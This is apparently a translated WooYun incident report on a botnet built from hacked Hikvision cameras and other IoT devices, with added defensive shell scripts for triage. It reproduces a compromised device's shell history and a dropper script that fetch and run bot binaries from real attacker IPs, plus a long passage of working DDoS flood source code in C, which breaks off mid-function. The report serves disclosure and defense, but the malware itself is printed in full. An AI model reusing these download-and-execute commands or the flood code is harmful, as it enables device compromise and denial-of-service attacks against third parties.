
Vulnerability summary

Defect ID: wooyun-2014-087132

Title: Hikvision and other surveillance and IoT devices used in a botnet (a real instance)

Related vendor: cncert

Author: 路人甲 (anonymous)

Submitted: 2014-12-14 17:51

Fix time: 2015-03-14 17:52

Public disclosure: 2015-03-14 17:52

Vulnerability type: underground 0day / successful intrusion incident

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-12-14: details sent to the vendor, awaiting vendor handling
2014-12-17: vendor confirmed; details visible to the vendor only
2014-12-20: details opened to third-party security partners
2015-02-10: details opened to core white hats and domain experts
2015-02-20: details opened to regular white hats
2015-03-02: details opened to intern white hats
2015-03-14: details made public

Brief description:

A real instance of a botnet built from surveillance cameras and other IoT devices.
Hardware range: davinci, ralink, rtl8196c, ar5315, faraday, arm_hi
Mostly MIPS and ARM, which covers the bulk of terminals, surveillance devices, routers and other Internet-connected equipment.

Detailed description:

Find a Hikvision device with a weak telnet password and cat .ash_history (the ash shell's command history):

# cat .ash_history
echo $?K_O_S_T_Y_P_E
echo CMDBEGIN ; ls -l /proc/self/exe ; echo CMDEND
echo CMDBEGIN ; cat /proc//\cpuinfo ; echo CMDEND
echo CMDBEGIN ; cd /dev;rm -rf 0915.davinci ; echo CMDEND
echo CMDBEGIN ; rm -rf 123;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; rm -rf 123;umount -l /var ; echo CMDEND
echo CMDBEGIN ; cd ..;cd var;busybox tft1p -g -r 1.sh 121.199.10.66;chmod 777 *;./12.sh &: ; echo CMDEND
############################################
############################################
echo CMDBEGIN ; cd /home;busybox ftpget -u 886 -p 886 61.147.107.94 0923.davinci 0923.davinci;chmod 777 *;./0923.davinci ; echo CMDEND
echo CMDBEGIN ; busybox echo 123 ; echo CMDEND
################################################
################################################
echo CMDBEGIN ; cd /mnt;busybox tftp -g -r /s/0923.8196 123.56.86.13;chmod 777 *;./0923.8196 ; echo CMDEND
###############################################
###############################################
echo CMDBEGIN ; busybox echo 123 ; echo CMDEND
echo CMDBEGIN ; busybox cd /etc;mount1 -v -o soft,async,intr,udp,nolock,rsize=1024,wsize=1024 121.199.10.66:/s /etc;cd /etc;./0923.davinci;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; busybox echo 123 ; echo CMDEND
echo CMDBEGIN ; cd /etc;./0916.davinci;./socket5_rdlink;umount -l /etc &: ; echo CMDEND
###############################################
###############################################
echo CMDBEGIN ; mkdir www2;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; busybox wg1et http://211.155.226.20:8080/socket5_davinci;chmod 777 *;./socket5_davinci ; echo CMDEND
###############################################
###############################################
echo CMDBEGIN ; busybox t1ftp -g -r socket5_rdlink 121.199.10.66;chmod 777 *;./socket51_rdlink ; echo CMDEND
###############################################
###############################################


Judging from the history, this box has been compromised several times over; each run of # separators marks one intrusion. The echo CMDBEGIN ; ... ; echo CMDEND wrapper around every command is how an automated telnet loader delimits each command's output, so these sessions were scripted, not typed by hand. Because busybox telnetd keeps no log, when and from where the logins happened is unknown. Most of the IPs are dead by now; from a few the files can still be downloaded, and the FTP server's contents could be pulled down in their entirety. (Some command names in the listing, tft1p, t1ftp, wg1et, mount1 and socket51_rdlink, are reproduced exactly as found.)

[Screenshot: 捕获1.JPG]


Professional operators, probably running DDoS from a cluster of Linux boxes. A stripped-down busybox has no wget applet at all, so calling wget on these devices is pointless; and the file names used by the different operators are so similar that the toolkit has clearly leaked and been passed around.
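The following is an added example and not part of the original report: a POSIX shell function that parses an .ash_history in the CMDBEGIN/CMDEND format shown above and prints one line per download stage (method, server, artifact), plus a helper that lists the distinct download servers for a block list. The sample history is a constructed excerpt of the lines shown above (the IPs are the ones in the capture); the mangled applet names in the capture (tft1p, t1ftp, wg1et, mount1) are normalised before parsing, on the assumption that they stand for tftp, wget and mount.

```shell
#!/bin/sh
# Added example: pull download-stage IOCs out of an .ash_history left by an
# automated telnet loader (every command wrapped in echo CMDBEGIN / echo CMDEND).

# Constructed sample: an excerpt of the history shown in the report.
SAMPLE_HISTORY=$(cat <<'EOF'
echo CMDBEGIN ; ls -l /proc/self/exe ; echo CMDEND
echo CMDBEGIN ; cd ..;cd var;busybox tft1p -g -r 1.sh 121.199.10.66;chmod 777 *;./12.sh &: ; echo CMDEND
echo CMDBEGIN ; cd /home;busybox ftpget -u 886 -p 886 61.147.107.94 0923.davinci 0923.davinci;chmod 777 *;./0923.davinci ; echo CMDEND
echo CMDBEGIN ; cd /mnt;busybox tftp -g -r /s/0923.8196 123.56.86.13;chmod 777 *;./0923.8196 ; echo CMDEND
echo CMDBEGIN ; busybox cd /etc;mount1 -v -o soft,async,intr,udp,nolock,rsize=1024,wsize=1024 121.199.10.66:/s /etc;cd /etc;./0923.davinci;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; busybox wg1et http://211.155.226.20:8080/socket5_davinci;chmod 777 *;./socket5_davinci ; echo CMDEND
EOF
)

# extract_stages: history on stdin -> "<method> <server> <artifact>" per stage.
# Steps: 1. keep only the payload between the CMDBEGIN/CMDEND markers;
#        2. undo the mangled applet names (assumed: tft1p/t1ftp = tftp,
#           wg1et = wget, mount1 = mount);
#        3. split on ';' so each simple command is on its own line;
#        4. recognise the four retrieval methods seen in the capture.
extract_stages() {
    sed -n 's/^echo CMDBEGIN ; \(.*\) ; echo CMDEND$/\1/p' |
    sed -e 's/tft1p/tftp/g; s/t1ftp/tftp/g; s/wg1et/wget/g; s/mount1/mount/g' |
    tr ';' '\n' |
    awk '
        $1 == "busybox" && $2 == "tftp" {        # tftp -g -r FILE HOST (option order varies)
            f = ""; for (i = 3; i <= NF; i++) if ($i == "-r") f = $(i + 1)
            print "tftp", $NF, f
        }
        $1 == "busybox" && $2 == "ftpget" {      # ftpget -u U -p P HOST LOCAL REMOTE
            print "ftp", $(NF - 2), $NF
        }
        $1 == "busybox" && $2 == "wget" {        # wget URL
            u = $NF; sub(/^[a-z]*:\/\//, "", u); n = split(u, p, "/")
            print "http", p[1], p[n]
        }
        $1 == "mount" {                          # mount ... HOST:/export /dir, then run from it
            for (i = 2; i <= NF; i++)
                if (index($i, ":/")) { split($i, h, ":"); print "nfs", h[1], h[2] }
        }
    '
}

# list_servers: distinct download servers (port stripped), ready for a block list.
list_servers() {
    extract_stages | awk '{ sub(/:.*/, "", $2); print $2 }' | sort -u
}

printf '%s\n' "$SAMPLE_HISTORY" | extract_stages
printf '%s\n' "$SAMPLE_HISTORY" | list_servers
```

Run it on the device itself as `extract_stages < /root/.ash_history` (busybox sed, tr and awk suffice), or on a copy pulled off the box. The artifact column is the remote name the loader asked for; the binary actually executed may differ (the first stage fetches 1.sh but runs ./12.sh), so hunt for both.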

Proof of vulnerability:

Among the files downloaded from the FTP server, the main shell scripts are bin.sh and download.sh; the other scripts are unfinished. Analysis of download.sh:

#!/bin/sh
while read LINE
do
HARDWARE_LEN=${#LINE}
RTL8196_HARDWARE=${LINE/"RTL8196C"/}
RTL8196_HARDWARE_LEN=${#RTL8196_HARDWARE}
if [ "$RTL8196_HARDWARE_LEN" != "$HARDWARE_LEN" ]; then
echo "this is rtl8196c"
#do something
exit 0
fi
DAVINCI_HARDWARE=${LINE/"DaVinci"/}
DAVINCI_HARDWARE_LEN=${#DAVINCI_HARDWARE}
if [ "$DAVINCI_HARDWARE_LEN" != "$HARDWARE_LEN" ]; then
echo "this is davinci"
#do something
exit 0
fi
RDLINK_HARDWARE=${LINE/"Ralink"/}
RDLINK_HARDWARE_LEN=${#RDLINK_HARDWARE}
if [ "$RDLINK_HARDWARE_LEN" != "$HARDWARE_LEN" ]; then
echo "this is ralink"
#do something
exit 0
fi
AR_HARDWARE=${LINE/"AR5315"/}
AR_HARDWARE_LEN=${#AR_HARDWARE}
if [ "$AR_HARDWARE_LEN" != "$HARDWARE_LEN" ]; then
echo "this is ar5315"
#do something
exit 0
fi
FARADAY_HARDWARE=${LINE/"Faraday"/}
FARADAY_HARDWARE_LEN=${#FARADAY_HARDWARE}
if [ "$FARADAY_HARDWARE_LEN" != "$HARDWARE_LEN" ]; then
echo "this is faraday"
#do something
exit 0
fi
HI_HARDWARE=${LINE/"ARM"/}
HI_HARDWARE_LEN=${#HI_HARDWARE}
if [ "$HI_HARDWARE_LEN" != "$HARDWARE_LEN" ]; then
echo "this is arm_hi"
#do something
exit 0
fi
done</proc/cpuinfo


It determines the hardware type: it reads /proc/cpuinfo line by line and tests each line for a substring by comparing the line's length before and after the substring is stripped out. Hikvision devices are DaVinci-based, as can be seen here; the hardware coverage is very broad.
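As an added example, not code from the toolkit or the report: the same platform selection in portable sh. The original relies on ${LINE/pattern/}, a bash extension that dash rejects and busybox ash accepts only when built with its bash-compatibility option, so a `case` pattern is used instead. detect_linewise reproduces download.sh's logic exactly (each line tested in script order, first hit wins); detect_wholefile shows why that ordering matters, because the catch-all "ARM" test fires on any line mentioning ARM before a later "Hardware" line is reached. The /proc/cpuinfo excerpts are constructed, not captured from real devices.

```shell
#!/bin/sh
# Added example: the platform selection download.sh performs, in portable sh.

# Constructed /proc/cpuinfo excerpts (not captured from real devices).
CPUINFO_RTL='system type : RTL8196C
processor : 0
cpu model : R3000 V0.0'
CPUINFO_RALINK='system type : Ralink RT3052 id:1 rev:2
processor : 0'
CPUINFO_ARM_DAVINCI='Processor : ARM926EJ-S rev 5 (v5l)
BogoMIPS : 148.88
Hardware : DaVinci DM365'

# detect_linewise: what download.sh does. Each /proc/cpuinfo line is tested for
# the substrings in script order and the first hit decides; prints the label,
# or "unknown" (exit 1) when no line matches.
detect_linewise() {
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            *RTL8196C*) echo rtl8196c; return 0 ;;
            *DaVinci*)  echo davinci;  return 0 ;;
            *Ralink*)   echo ralink;   return 0 ;;
            *AR5315*)   echo ar5315;   return 0 ;;
            *Faraday*)  echo faraday;  return 0 ;;
            *ARM*)      echo arm_hi;   return 0 ;;
        esac
    done
    echo unknown; return 1
}

# detect_wholefile: same labels, but matched against the whole file with the
# specific names tried before the catch-all "ARM", so a DaVinci board whose
# "Processor" line mentions ARM is still labelled davinci.
detect_wholefile() {
    text=$(cat)
    case $text in
        *RTL8196C*) echo rtl8196c ;;
        *DaVinci*)  echo davinci ;;
        *Ralink*)   echo ralink ;;
        *AR5315*)   echo ar5315 ;;
        *Faraday*)  echo faraday ;;
        *ARM*)      echo arm_hi ;;
        *)          echo unknown; return 1 ;;
    esac
}

printf '%s\n' "$CPUINFO_RTL" | detect_linewise          # rtl8196c
printf '%s\n' "$CPUINFO_ARM_DAVINCI" | detect_linewise  # arm_hi: the ARM test fires on line 1
printf '%s\n' "$CPUINFO_ARM_DAVINCI" | detect_wholefile # davinci
```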
Analysis of bin.sh:

#!/bin/sh
cd /tmp/
rm -rf *
sleep 3;
killall telnetx
killall mips
killall mipsel
killall arm
killall ppc
killall arm7
killall superh
killall i586
killall i686
#sleep 3;
busybox tftp -r mips -g 93.174.93.52; cp /bin/busybox ./; cat mips > busybox; rm mips; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r mipsel -g 93.174.93.52; cp /bin/busybox ./; cat mipsel > busybox; rm mipsel; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r arm -g 93.174.93.52; cp /bin/busybox ./; cat arm > busybox; rm arm; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r arm7 -g 93.174.93.52; cp /bin/busybox ./; cat arm7 > busybox; rm arm7; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r ppc -g 93.174.93.52; cp /bin/busybox ./; cat ppc > busybox; rm ppc; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r superh -g 93.174.93.52; cp /bin/busybox ./; cat superh > busybox; rm superh; cp busybox telnetx; rm busybox; ./telnetx;rm telnetx
busybox tftp -r i586 -g 93.174.93.52; cp /bin/busybox ./; cat i586 > busybox; rm i586; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r i686 -g 93.174.93.52; cp /bin/busybox ./; cat i686 > busybox; rm i686; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
busybox tftp -r sparc -g 93.174.93.52; cp /bin/busybox ./; cat sparc > busybox; rm sparc; cp busybox telnetx; rm busybox; ./telnetx;rm telnetx
#sleep 3;
rm -rf *
#sleep 15;
#iptables -A INPUT -p tcp -d 10.0.0.0/8 --dport 23 -j ACCEPT
#iptables -A INPUT -p tcp -d 10.0.0.0/8 --dport 80 -j ACCEPT
#iptables -A INPUT -p tcp -d 127.0.0.0/8 --dport 23 -j ACCEPT
#iptables -A INPUT -p tcp -d 127.0.0.0/8 --dport 80 -j ACCEPT
#iptables -A INPUT -p tcp -d 192.168.0.0/16 --dport 23 -j ACCEPT
#iptables -A INPUT -p tcp -d 192.168.0.0/16 --dport 80 -j ACCEPT
#iptables -A INPUT -p tcp --dport 23 -j DROP
#iptables -A INPUT -p tcp --dport 80 -j DROP


From the above, this is the script that fetches and runs the payload for each hardware type. It first kills any earlier copy of itself (the per-architecture names in the killall list), then for every architecture pulls one binary by tftp, overwrites a copy of busybox (already executable) with it so no chmod is needed, runs it under the name telnetx and deletes the file; whichever build actually runs survives only in memory, with its /proc/<pid>/exe link pointing at a deleted file. The iptables rules at the end, which would leave ports 23 and 80 reachable only from private ranges, are present but commented out.
Well, actually I'm not sure this is a shell, because

[Screenshot: 捕获.JPG]


judging from the file names it is a SOCKS5 proxy.
TAT
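As an added example, not part of the original report: two triage checks for a device suspected of running the bin.sh payload, written as shell functions that read command output on stdin so they can run on the box itself (busybox ls and ps) or on output copied off it. The first flags processes whose binary was unlinked after exec, which is exactly what bin.sh's `./telnetx; rm telnetx` produces; the second matches process names against the names bin.sh uses and kills. Both samples are constructed listings, and the name list is only what this particular bin.sh uses, so a renamed build would escape the second check.

```shell
#!/bin/sh
# Added example: two triage checks for a device suspected of running bin.sh.

# Process names bin.sh kills before reinstalling: its own per-architecture builds.
DROPPER_NAMES="telnetx mips mipsel arm arm7 ppc superh i586 i686 sparc"

# Constructed sample of `ls -l /proc/[0-9]*/exe` (run as root so every link is readable).
SAMPLE_EXE_LINKS='lrwxrwxrwx 1 root root 0 Jan  1 00:00 /proc/1/exe -> /bin/busybox
lrwxrwxrwx 1 root root 0 Jan  1 00:00 /proc/812/exe -> /bin/busybox
lrwxrwxrwx 1 root root 0 Jan  1 00:00 /proc/901/exe -> /tmp/telnetx (deleted)
lrwxrwxrwx 1 root root 0 Jan  1 00:00 /proc/903/exe -> /bin/busybox'

# Constructed sample of busybox `ps` output (PID USER VSZ STAT COMMAND).
SAMPLE_PS='  PID USER       VSZ STAT COMMAND
    1 root      1100 S    init
  812 root      2280 S    telnetd
  901 root      3352 R    ./telnetx
  903 root      1100 S    /bin/sh ./12.sh'

# deleted_executables: "<pid> <path>" for every process whose binary was
# unlinked after exec. bin.sh runs ./telnetx and immediately rm's it, so the
# live bot is visible only this way.
deleted_executables() {
    awk '/\(deleted\)/ && match($0, /\/proc\/[0-9]+\/exe/) {
        pid = substr($0, RSTART + 6, RLENGTH - 10)
        sub(/.*-> /, ""); sub(/ \(deleted\)$/, "")
        print pid, $0
    }'
}

# dropper_processes: "<pid> <name>" for processes whose command basename is
# one of the dropper's names.
dropper_processes() {
    awk -v names="$DROPPER_NAMES" '
        BEGIN { n = split(names, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        NR > 1 { cmd = $5; sub(/.*\//, "", cmd); if (cmd in want) print $1, cmd }'
}

printf '%s\n' "$SAMPLE_EXE_LINKS" | deleted_executables   # 901 /tmp/telnetx
printf '%s\n' "$SAMPLE_PS" | dropper_processes            # 901 telnetx
```

A hit from deleted_executables can still be recovered for analysis with `cat /proc/<pid>/exe > /tmp/sample` before the process is killed, since the kernel keeps the unlinked file alive while it is mapped.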
Analysis of the other files, mainly the archives shown in the screenshot above. In the code archive I found:

/* * =====================================================================================
*
* Filename: test.c
*
* Description:
*
* Version: 1.0
* Created: 2014-06-20 21:34:11
* Revision: none
* Compiler: gcc
*
* Author: YOUR NAME (),
* Company:
*
* =====================================================================================
*/


Next, the source of attack.c shows that it is used for DDoS:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <signal.h>
//#include <pthread.h>
#include "common.h"
#include "attack.h"
#define MAX_PATH 512
typedef int SOCKET;
static int getrandom(int min, int max)
{
if (min == max)
{
return min;
}
srand(time(NULL));
int seed = rand() + 3;
return seed % (max - min + 1) + min;
}
static int onerandom(int count)
{
unsigned long now = (unsigned long)time(NULL);
int seed = rand() + 3;
return (seed * now) % count;
}
static unsigned long resolve(char *host)
{
unsigned long i = 0;
char ip[32];
struct in_addr addr;
if (!resolve_ip(host, ip))
return 0;
inet_aton(ip, &addr);
return *(unsigned long *)&addr;
}
int tcpConnect(char *host, int port)
{
int sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == -1)
return sock;
struct sockaddr_in sin;
unsigned long ip = resolve(host);
if(ip == 0)
ip = inet_addr(host);
sin.sin_addr.s_addr = ip;
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
close(sock);
return -1;
}
return sock;
}
// TCP Flood
static int TcpDataFlood(void *param)
{
pid_t pid;
COMMAND *cmd = (COMMAND *)param;
int sockfd;
struct sockaddr_in servaddr;
char *buffer;
pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -1;
}

if ((buffer = malloc(1024)) == NULL)
{
DEBUG(DEBUG_FATAL,"!! memory out\n");
return -1;
}
memset(&servaddr, 0, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = resolve(cmd->target);
servaddr.sin_port = htons(cmd->port);
sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
DEBUG(DEBUG_FATAL,"!! create socket failed\n");
free(buffer);
return -1;
}
if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
{
DEBUG(DEBUG_FATAL,"!! connect server failed\n");
free(buffer);
close(sockfd);
return -1;
}
memset(buffer, getrandom(0, 255), 1024);
while (1)
{
send(sockfd, buffer, 1024, MSG_NOSIGNAL);
usleep(1000 * cmd->delay);
}
free(buffer);
close(sockfd);
exit(0);;
}
// TCP concurrent connections
static int TcpMultiConnect(void *param)
{
COMMAND *cmd = (COMMAND *)param;
int sockfd;
struct sockaddr_in servaddr;
pid_t pid;

pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -1;
}

memset(&servaddr, 0, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = resolve(cmd->target);
servaddr.sin_port = htons(cmd->port);
while (1)
{
sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
usleep(1000 * 10);
close(sockfd);
}
exit(0);;
}
// TCP malformed connection
static int TcpCatFace(void *param)
{
COMMAND *cmd = (COMMAND *)param;
int sockfd;
struct sockaddr_in servaddr;
char *buffer;
pid_t pid;

pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -1;
}
if ((buffer = malloc(2048)) == NULL)
{
DEBUG(DEBUG_FATAL,"!! memory out\n");
return -1;
}
memset(&servaddr, 0, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = resolve(cmd->target);
servaddr.sin_port = htons(cmd->port);
sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
DEBUG(DEBUG_FATAL,"!! create socket failed\n");
free(buffer);
return -1;
}
if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
{
DEBUG(DEBUG_FATAL,"!! connect server failed\n");
free(buffer);
close(sockfd);
return -1;
}
memset(buffer, 'a' + onerandom(26), 1024 + onerandom(1024));
while (1)
{
send(sockfd, buffer, 2048, MSG_NOSIGNAL);
usleep(1000 * 10);
}
free(buffer);
close(sockfd);
exit(0);;
}
// HTTP GET
static int WebGetFull(void *param)
{
COMMAND *cmd = (COMMAND *)param;
char *ptr;
char *tIP, *zIP, *ctsz, *strTrueDNS;
char *url, *http, *rhost;
int sockfd;
pid_t pid;

pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -1;
}
tIP = malloc(MAX_PATH);
zIP = malloc(MAX_PATH);
ctsz = malloc(MAX_PATH);
strTrueDNS = malloc(MAX_PATH);
url = malloc(MAX_PATH * 4);
http = malloc(MAX_PATH);
rhost = malloc(MAX_PATH);
if (!tIP || !zIP || !ctsz || !strTrueDNS || !url || !http || !rhost)
{
DEBUG(DEBUG_FATAL,"!! memory out\n");
goto cleanup;
}
memset(tIP, 0, MAX_PATH);
memset(zIP, 0, MAX_PATH);
memset(ctsz, 0, MAX_PATH);
memset(strTrueDNS, 0, MAX_PATH);
memset(url, 0, MAX_PATH * 4);
memset(http, 0, MAX_PATH);
memset(rhost, 0, MAX_PATH);
strcpy(tIP, cmd->target + 7);
strcpy(zIP, tIP);
ptr = strchr(zIP, '/');
if (ptr == NULL)
{
DEBUG(DEBUG_FATAL,"!! invalid target address\n");
goto cleanup;
}
memset(ptr, 0, strlen(ptr));
strcpy(tIP, strchr(tIP, '/') + 1);
strcpy(ctsz, tIP);
if (inet_addr(zIP) == INADDR_NONE)
{
char ip[32];
if (resolve_ip(zIP, ip))
{
strcpy(strTrueDNS, ip);
}
else
{
strcpy(strTrueDNS, zIP);
}
}
else
{
strcpy(strTrueDNS, zIP);
}
strcpy(http, zIP);
strcpy(rhost, http);
strcpy(url, "GET ");
strcat(url, ctsz);
strcat(url, " HTTP/1.1\r\n");
strcat(url, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n");
strcat(url, "Accept-Language: zh-cn\r\n");
strcat(url, "Accept-Encoding: gzip, deflate");
strcat(url, "\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
strcat(url, "\r\nHost:");
strcat(url, rhost);
strcat(url, "\r\nConnection: Keep-Alive");
strcat(url, "\r\n\r\n");
while (1)
{
int S=tcpConnect(strTrueDNS,cmd->port);
send(S,url,strlen(url) ,MSG_NOSIGNAL);
close(S);
usleep(1000*cmd->delay);
}
cleanup:
if (tIP) free(tIP);
if (zIP) free(zIP);
if (ctsz) free(ctsz);
if (strTrueDNS) free(strTrueDNS);
if (url) free(url);
if (http) free(http);
if (rhost) free(rhost);
exit(0);;
}
// Mutated CC stress test
static int WebCCAttack(void *param)
{
COMMAND *cmd = (COMMAND *)param;
char ip[32],url[64],*point=NULL;
pid_t pid;

pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -1;
}
point=cmd->target;
//http://
char strHttp[]={0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x00};
if(strstr(cmd->target,strHttp)!=NULL)
{
point=point+strlen(strHttp);
}
if(strstr(point,"/")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,point,strcspn(point,"/"));
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
if (strlen(url)<2)
{
strcpy(url,"/");
}
struct sockaddr_in sockAddr;
SOCKET m_hSocket;
memset(&sockAddr,0,sizeof(sockAddr));
sockAddr.sin_family = AF_INET;
sockAddr.sin_port=htons(cmd->port);
sockAddr.sin_addr.s_addr=resolve(ip);
char header[MAX_PATH] = "";
//Connection: Close
char strConnection[]={0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x3A, 0x20, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00};
//Mozilla/5.0
char strMozilla[]={0x4D, 0x6F, 0x7A, 0x69, 0x6C, 0x6C, 0x61, 0x2F, 0x35, 0x2E, 0x30, 0x00};
//Host:
char strHost[]={0x48, 0x6F, 0x73, 0x74, 0x3A, 0x00};
//Connection:
char strCon[]={0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x3A, 0x00};
if (cmd->port == 80 )
{
sprintf(header,
"GET %s HTTP/1.1\r\n"
"%s %s\r\n"
"User-Agent: %s (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15"
"Cache-Control: no-store, must-revalidate\r\n"
"Referer: %s%s\r\n"
"%s keep-alive\r\n\r\n",
url,
strHost,
ip,
strMozilla,
strHttp,
ip,strCon);
}
else
{
sprintf(header,
"GET %s HTTP/1.1\r\n"
"%s %s:%d\r\n"
"User-Agent: %s (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15"
"Cache-Control: no-store, must-revalidate\r\n"
"Referer: //%s\r\n"
"%s\r\n\r\n",
url,
strHost,
ip,
cmd->port,
strMozilla,
strHttp,
ip,strConnection);
}
while(1)
{
m_hSocket =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(m_hSocket,(struct sockaddr *)&sockAddr,sizeof(struct sockaddr_in));
send(m_hSocket, header, strlen(header), MSG_NOSIGNAL);
close(m_hSocket);
usleep(1000*cmd->delay);
}
exit(0);;
}
// Unlimited CC stress test
static int WebInfinitudeCC(void *param)
{
COMMAND *cmd = (COMMAND *)param;
char *url, *http, *rhost;
char *FuckIP = cmd->target;
int FuckPort = cmd->port;
pid_t pid;

pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -1;
}
url = malloc(MAX_PATH * 4);
http = malloc(MAX_PATH);
rhost = malloc(MAX_PATH);
if (!url || !http || !rhost)
{
DEBUG(DEBUG_FATAL,"!! memory out\n");
goto cleanup;
}
memset(url, 0, MAX_PATH*4);
memset(http, 0,MAX_PATH);
memset(rhost, 0,MAX_PATH);
strcpy(http,FuckIP);
strcpy(rhost,http);
//char *jj = "/";
char jj[2] = {'/', '\0'};
strcpy(url,"GET ");
strcat(url,jj);
strcat(url," HTTP/1.1\r\n");
strcat(url,"Content-Type: text/html");
strcat(url,"\r\nHost: ");
strcat(url,rhost);
strcat(url,"\r\nAccept: text/html, */*");
strcat(url,"\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)");
strcat(url,"\r\n\r\n");;
while (1)
{
SOCKET S=tcpConnect(FuckIP,FuckPort);
send(S,url,strlen(url) ,MSG_NOSIGNAL);
//close(S);
usleep(1000*cmd->delay);
}
cleanup:
if (url) free(url);
if (http) free(http);
if (rhost) free(rhost);
exit(0);
}
// Distributed cyclic CC
static int WebSpiderCC(void *param)
{
COMMAND *cmd = (COMMAND *)param;
char ip[32],url[100],*point=NULL, *FuckIP=cmd->target;
point=FuckIP;
int FuckPort = cmd->port;
int iBenginParam = cmd->var1;
int iEndParam = cmd->var2;
pid_t pid;

pid = fork();
if (pid > 0)
{
return pid; // parent process returns
}
else if (pid < 0)
{
return -11;
}
//http://
char strHttp[]={0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x00};
if(strstr(FuckIP,strHttp)!=NULL)
{
point=point+strlen(strHttp);
}
if(strstr(point,"/")!=NULL)
{
memset(ip,0,sizeof(ip));
strncpy(ip,point,strcspn(point,"/"));
point=point+strcspn(point,"/");
memset(url,0,sizeof(url));
strcpy(url,point);
}
if (strlen(url)<2)
{
strcpy(url,"/");
}
struct sockaddr_in sockAddr;
SOCKET m_hSocket;
memset(&sockAddr,0,sizeof(sockAddr));
sockAddr.sin_family = AF_INET;
sockAddr.sin_port=htons(FuckPort);
sockAddr.sin_addr.s_addr=resolve(ip);
char header[MAX_PATH] = "";
char szUrlchg[100];
int iParam = iBenginParam;
//Connection: Close
char strConnection[]={0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x3A, 0x20, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00};
//Mozilla/5.0
char strMozilla[]={0x4D, 0x6F, 0x7A, 0x69, 0x6C, 0x6C, 0x61, 0x2F, 0x35, 0x2E, 0x30, 0x00};
//Host:
char strHost[]={0x48, 0x6F, 0x73, 0x74, 0x3A, 0x00};
while(1)
{
sprintf(szUrlchg,url,iParam);
iParam++;
if(iParam > iEndParam)
iParam = iBenginParam;
if (FuckPort == 80 )
{
sprintf(header,
"GET %s HTTP/1.1\r\n"
"%s %s\r\n"
"Cache-Control: no-store, must-revalidate\r\n"
"Referer: %s%s\r\n"
"%s\r\n\r\n",
szUrlchg,
strHost,
strHttp,
ip,
ip,strConnection);
}
else
{
sprintf(header,
"GET %s HTTP/1.1\r\n"
"%s %s:%d\r\n"
"User-Agent: %s (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15"
"Cache-Control: no-store, must-revalidate\r\n"
"Referer: %s%s\r\n"
"%s\r\n\r\n",
szUrlchg,
strHost,
ip,
FuckPort,strMozilla,strHttp,
ip,strConnection);
}
m_hSocket =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(m_hSocket,(struct sockaddr *)&sockAddr,sizeof(struct sockaddr_in));
send(m_hSocket, header, strlen(header), MSG_NOSIGNAL);
close(m_hSocket);
